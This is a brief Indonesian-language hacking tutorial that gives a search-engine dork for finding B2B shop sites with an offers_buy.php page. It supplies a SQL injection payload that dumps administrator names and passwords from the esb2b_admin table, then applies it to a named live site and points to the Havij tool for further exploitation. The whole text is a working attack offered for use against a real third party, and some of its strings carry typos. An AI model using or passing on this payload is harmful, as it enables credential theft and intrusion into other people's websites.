hack shop admin exploit

DORK :

allinur:olffers_buy.php?id=

Exploit

-9999+union+all+select+0,0,group_concat(es_admin_name,char(58),es_pwd)v3n0m,0,0,0 ​,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+esb2b_admin--

atau

gen_confirm.html?errmsg=No+such+offer+exists+or+disabled+by+admin.

seakarng kita pilih web ini sebagai target:

http://www.b2bci.com/offers_buy.php?prod=buy&id=89

dam akan menjadi seperti ini :

http://www.b2bci.com/offers_buy.php?prod=buy&id=-9999+union+all+select+0,0,group_concat(es_admin_name,char(58),es_pwd)v3n0m,0,0,0 ​,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+esb2b_admin--

selanjut nya bisa gunakan tehnic sql or bisa jg menggunakan havij ok selamat mencoba brow.